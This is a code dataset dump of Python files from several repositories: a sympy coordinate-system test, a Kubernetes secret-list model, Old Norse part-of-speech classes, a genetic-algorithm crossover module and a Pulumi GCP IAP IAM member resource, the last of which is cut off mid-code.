hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
89928632b2aee5d553cc4a4c8e3c39d3adbe978b | 1,075 | py | Python | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | [
"CECILL-B"
] | null | null | null | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | [
"CECILL-B"
] | null | null | null | sympkf/symbolic/test/test_coordinate.py | opannekoucke/sympkf | 914dbc8127f16d28b1fe2f5afe2bc0864d53d644 | [
"CECILL-B"
] | null | null | null | import unittest
from sympkf.symbolic import CoordinateSystem
from sympy import symbols, Function, Matrix, Derivative
class TestCoordinateSystem(unittest.TestCase):
coords = CoordinateSystem(symbols('x y'))
def test_compatibility(self):
# Case not compatible
f = Function('f')(*symbols('t x'))
self.assertTrue(not self.coords.is_compatible(f))
# Case compatible
f = Function('f')(*symbols('t x y'))
self.assertTrue(self.coords.is_compatible(f))
def test_gradient_div(self):
# Case compatible
f = Function('f')(*symbols('t x y'))
x, y = symbols('x y')
# Computation of the gradient
grad_f = self.coords.gradient(f)
self.assertEqual(grad_f,Matrix([Derivative(f,x), Derivative(f,y)]))
# Computation of the divergent of the gradient which should be the laplacian here
div_grad_f = self.coords.div(grad_f)
lap_f = Derivative(f,x,2)+Derivative(f,y,2)
self.assertEqual(div_grad_f, lap_f)
if __name__ == '__main__':
unittest.main()
| 31.617647 | 89 | 0.653023 |
073b63d8c41de77411a8fab8e8aebe7c88f248d2 | 6,947 | py | Python | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | [
"Apache-2.0"
] | 1 | 2022-02-22T23:10:55.000Z | 2022-02-22T23:10:55.000Z | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | [
"Apache-2.0"
] | 6 | 2021-09-13T19:03:02.000Z | 2022-03-16T18:56:42.000Z | kubernetes/client/models/v1_secret_list.py | philipp-sontag-by/python | 51c481692ab0d9c71b9dd96342bfa93b721b029d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1SecretList(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_version': 'str',
'items': 'list[V1Secret]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None, local_vars_configuration=None): # noqa: E501
"""V1SecretList - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""Gets the api_version of this V1SecretList. # noqa: E501
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:return: The api_version of this V1SecretList. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1SecretList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources # noqa: E501
:param api_version: The api_version of this V1SecretList. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""Gets the items of this V1SecretList. # noqa: E501
Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501
:return: The items of this V1SecretList. # noqa: E501
:rtype: list[V1Secret]
"""
return self._items
@items.setter
def items(self, items):
"""Sets the items of this V1SecretList.
Items is a list of secret objects. More info: https://kubernetes.io/docs/concepts/configuration/secret # noqa: E501
:param items: The items of this V1SecretList. # noqa: E501
:type: list[V1Secret]
"""
if self.local_vars_configuration.client_side_validation and items is None: # noqa: E501
raise ValueError("Invalid value for `items`, must not be `None`") # noqa: E501
self._items = items
@property
def kind(self):
"""Gets the kind of this V1SecretList. # noqa: E501
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:return: The kind of this V1SecretList. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1SecretList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds # noqa: E501
:param kind: The kind of this V1SecretList. # noqa: E501
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""Gets the metadata of this V1SecretList. # noqa: E501
:return: The metadata of this V1SecretList. # noqa: E501
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""Sets the metadata of this V1SecretList.
:param metadata: The metadata of this V1SecretList. # noqa: E501
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1SecretList):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1SecretList):
return True
return self.to_dict() != other.to_dict()
| 33.723301 | 312 | 0.622859 |
88b1b7b4ecf8d06dc108fb62bb4d20a80ff91d94 | 4,040 | py | Python | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | [
"MIT"
] | 3 | 2018-11-30T13:42:18.000Z | 2021-04-15T22:39:31.000Z | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | [
"MIT"
] | null | null | null | edda/pos_utils.py | clemsciences/old_norse_notebook | 4e3608e9c0fa58b164009965f95052f309b15266 | [
"MIT"
] | null | null | null | """
"""
import abc
__author__ = ["Clément Besnier <clemsciences@aol.com>", ]
class POSFeatures:
def __init__(self):
self.masculine = False
self.feminine = False
self.neuter = False
self.singular = False
self.plural = False
self.dual = False
self.nominative = False
self.accusative = False
self.dative = False
self.genitive = False
self.definite = False
self.indefinite = False
self.positive = False
self.comparative = False
self.superlative = False
self.first = False
self.second = False
self.third = False
self.indicative = False
self.subjunctive = False
self.imperative = False
self.present = False
self.preterite = False
self.active = False
self.reflexive = False
self.infinitive = False
self.participle = False
self.strong = False
self.weak = False
self.reduplicating = False
self.preterito_present = False
self.noun = False
self.proper_noun = False
self.adjective = False
self.article = False
self.demonstrative = False
self.indefinite_demonstrative = False
self.possessive = False
self.personal = False
self.interrogative = False
self.relative = False
self.numeral = False
self.verb = False
self.adverb = False
self.conjunction = False
self.foreign = False
self.punctuation = False
self.unanalysed = False
def __eq__(self, other):
for i in range(len(self.vectorize())):
if self.vectorize()[i] != other.vectorize()[i]:
return False
return True
def vectorize(self):
return [
self.masculine,
self.feminine,
self.neuter,
self.singular,
self.plural,
self.dual,
self.nominative,
self.accusative,
self.dative,
self.genitive,
self.definite,
self.indefinite,
self.positive,
self.comparative,
self.superlative,
self.first,
self.second,
self.third,
self.indicative,
self.subjunctive,
self.imperative,
self.present,
self.preterite,
self.active,
self.reflexive,
self.infinitive,
self.participle,
self.strong,
self.weak,
self.reduplicating,
self.preterito_present,
self.noun,
self.proper_noun,
self.adjective,
self.article,
self.demonstrative,
self.indefinite_demonstrative,
self.possessive,
self.personal,
self.interrogative,
self.relative,
self.numeral,
self.verb,
self.adverb,
self.foreign,
self.punctuation,
self.unanalysed
]
class POSElement:
@staticmethod
@abc.abstractmethod
def parse(tag, value):
return value
@staticmethod
@abc.abstractmethod
def binarize(tag, features):
pass
class POSAbstract:
"""
"""
@staticmethod
@abc.abstractmethod
def apply(tag, l_pos, value):
"""
:param tag:
:param l_pos:
:param value:
:return:
"""
pass
@staticmethod
@abc.abstractmethod
def binarize(tag, l_pos, value):
"""
:param tag: POS tag
:param l_pos:
:param value:
:return:
"""
pass
@staticmethod
@abc.abstractmethod
def parse(full_tag, vector=False):
"""
:param full_tag: Pars oratori in annotated documents
:param vector:
:return: readable form of the POS tag
"""
pass
| 23.625731 | 60 | 0.52698 |
37f61b88032ad641c1db3f33e4a9d1320a04dab3 | 34 | py | Python | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | [
"BSD-3-Clause"
] | null | null | null | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | [
"BSD-3-Clause"
] | null | null | null | tests/__init__.py | phzwart/qlty | 701688e7cf00abfb5624042aa296099ee2e95773 | [
"BSD-3-Clause"
] | null | null | null | """Unit test package for qlty."""
| 17 | 33 | 0.647059 |
680bb718aec1426bf0c9c4c9c90f92a41b881be4 | 2,124 | py | Python | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | [
"MIT"
] | 15 | 2018-11-16T04:42:44.000Z | 2020-03-20T16:00:47.000Z | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | [
"MIT"
] | null | null | null | GA_tsp_optimisation/crossover.py | JessikaSmith/OptimizationAlgorithms | bf0f871f4d6150e1e7533360cfc6f70eb616c870 | [
"MIT"
] | 3 | 2019-01-17T13:18:56.000Z | 2019-12-17T22:22:48.000Z | import numpy as np
class Crossover:
def __init__(self, crossover_type, **kwargs):
self.crossover_type = crossover_type
def crossover(self, parent_1, parent_2, **kwargs):
if self.crossover_type == 'pmx':
return self.crossover_pmx(parent_1=parent_1, parent_2=parent_2)
if self.crossover_type == 'ordered':
return self.ordered_crossover(parent_1=parent_1, parent_2=parent_2)
if self.crossover_type == 'cycle':
return self.cycle_crossover(parent_1=parent_1, parent_2=parent_2)
def crossover_pmx(self, parent_1, parent_2):
points_num = len(parent_1)
cut_ix = np.random.choice(points_num - 2, 2, replace=False)
min_ix = np.min(cut_ix)
max_ix = np.max(cut_ix)
offspring_1 = np.zeros(points_num)
def ordered_crossover(self, parent_1, parent_2):
points_num = len(parent_1)
cut_ix = np.random.choice(points_num - 2, 2, replace=False)
min_ix = np.min(cut_ix)
max_ix = np.max(cut_ix)
offspring_1 = np.zeros(points_num)
current_ix = 0
set_1 = parent_1[min_ix:max_ix]
for i, elem in enumerate(parent_2):
if elem not in set_1:
if current_ix != min_ix:
offspring_1[current_ix] = elem
else:
current_ix = max_ix
offspring_1[current_ix] = elem
current_ix += 1
offspring_1[min_ix:max_ix] = set_1
offspring_2 = np.zeros(points_num)
current_ix = 0
set_2 = parent_2[min_ix:max_ix]
for i, elem in enumerate(parent_1):
if elem not in set_2:
if current_ix != min_ix:
offspring_2[current_ix] = elem
else:
current_ix = max_ix
offspring_2[current_ix] = elem
current_ix += 1
offspring_2[min_ix:max_ix] = set_2
return [int(i) for i in offspring_1], [int(i) for i in offspring_2]
def cycle_crossover(self, parent_1, parent_2):
raise NotImplementedError
| 37.263158 | 79 | 0.59322 |
4089776c4b5d23d28aa5ec3b1bddafba61a6bc9f | 26,087 | py | Python | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/iap/web_iam_member.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['WebIamMemberArgs', 'WebIamMember']
@pulumi.input_type
class WebIamMemberArgs:
def __init__(__self__, *,
member: pulumi.Input[str],
role: pulumi.Input[str],
condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a WebIamMember resource.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
:param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
pulumi.set(__self__, "member", member)
pulumi.set(__self__, "role", role)
if condition is not None:
pulumi.set(__self__, "condition", condition)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter
def member(self) -> pulumi.Input[str]:
return pulumi.get(self, "member")
@member.setter
def member(self, value: pulumi.Input[str]):
pulumi.set(self, "member", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _WebIamMemberState:
def __init__(__self__, *,
condition: Optional[pulumi.Input['WebIamMemberConditionArgs']] = None,
etag: Optional[pulumi.Input[str]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering WebIamMember resources.
:param pulumi.Input['WebIamMemberConditionArgs'] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] etag: (Computed) The etag of the IAM policy.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
if condition is not None:
pulumi.set(__self__, "condition", condition)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if member is not None:
pulumi.set(__self__, "member", member)
if project is not None:
pulumi.set(__self__, "project", project)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['WebIamMemberConditionArgs']]:
"""
) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['WebIamMemberConditionArgs']]):
pulumi.set(self, "condition", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The etag of the IAM policy.
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def member(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "member")
@member.setter
def member(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "member", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
class WebIamMember(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case:
* `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached.
* `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved.
* `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved.
> **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be.
> **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role.
## google\_iap\_web\_iam\_policy
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.organizations.GetIAMPolicyBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
),
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
## google\_iap\_web\_iam\_binding
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"])
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.iap.WebIamBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## google\_iap\_web\_iam\_member
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com")
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com",
condition=gcp.iap.WebIamMemberConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## Import
For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com"
```
IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor"
```
IAM policy imports use the identifier of the resource in question, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web
```
-> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']] condition: ) An [IAM Condition](https://cloud.google.com/iam/docs/conditions-overview) for a given binding.
Structure is documented below.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the project will be parsed from the identifier of the parent resource. If no project is provided in the parent identifier and no project is specified, the provider project is used.
:param pulumi.Input[str] role: The role that should be applied. Only one
`iap.WebIamBinding` can be used per role. Note that custom roles must be of the format
`[projects|organizations]/{parent-name}/roles/{role-name}`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WebIamMemberArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Three different resources help you manage your IAM policy for Identity-Aware Proxy Web. Each of these resources serves a different use case:
* `iap.WebIamPolicy`: Authoritative. Sets the IAM policy for the web and replaces any existing policy already attached.
* `iap.WebIamBinding`: Authoritative for a given role. Updates the IAM policy to grant a role to a list of members. Other roles within the IAM policy for the web are preserved.
* `iap.WebIamMember`: Non-authoritative. Updates the IAM policy to grant a role to a new member. Other members for the role for the web are preserved.
> **Note:** `iap.WebIamPolicy` **cannot** be used in conjunction with `iap.WebIamBinding` and `iap.WebIamMember` or they will fight over what your policy should be.
> **Note:** `iap.WebIamBinding` resources **can be** used in conjunction with `iap.WebIamMember` resources **only if** they do not grant privilege to the same role.
## google\_iap\_web\_iam\_policy
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
admin = gcp.organizations.get_iam_policy(bindings=[gcp.organizations.GetIAMPolicyBindingArgs(
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.organizations.GetIAMPolicyBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
),
)])
policy = gcp.iap.WebIamPolicy("policy",
project=google_project_service["project_service"]["project"],
policy_data=admin.policy_data)
```
## google\_iap\_web\_iam\_binding
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"])
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
binding = gcp.iap.WebIamBinding("binding",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
members=["user:jane@example.com"],
condition=gcp.iap.WebIamBindingConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## google\_iap\_web\_iam\_member
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com")
```
With IAM Conditions:
```python
import pulumi
import pulumi_gcp as gcp
member = gcp.iap.WebIamMember("member",
project=google_project_service["project_service"]["project"],
role="roles/iap.httpsResourceAccessor",
member="user:jane@example.com",
condition=gcp.iap.WebIamMemberConditionArgs(
title="expires_after_2019_12_31",
description="Expiring at midnight of 2019-12-31",
expression="request.time < timestamp(\"2020-01-01T00:00:00Z\")",
))
```
## Import
For all import syntaxes, the "resource in question" can take any of the following forms* projects/{{project}}/iap_web * {{project}} Any variables not passed in the import command will be taken from the provider configuration. Identity-Aware Proxy web IAM resources can be imported using the resource identifiers, role, and member. IAM member imports use space-delimited identifiersthe resource in question, the role, and the member identity, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor user:jane@example.com"
```
IAM binding imports use space-delimited identifiersthe resource in question and the role, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor "projects/{{project}}/iap_web roles/iap.httpsResourceAccessor"
```
IAM policy imports use the identifier of the resource in question, e.g.
```sh
$ pulumi import gcp:iap/webIamMember:WebIamMember editor projects/{{project}}/iap_web
```
-> **Custom Roles**If you're importing a IAM resource with a custom role, make sure to use the
full name of the custom role, e.g. `[projects/my-project|organizations/my-org]/roles/my-custom-role`.
:param str resource_name: The name of the resource.
:param WebIamMemberArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WebIamMemberArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['WebIamMemberConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WebIamMemberArgs.__new__(WebIamMemberArgs)
__props__.__dict__["condition"] = condition
if member is None and not opts.urn:
raise TypeError("Missing required property 'member'")
__props__.__dict__["member"] = member
__props__.__dict__["project"] = project
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
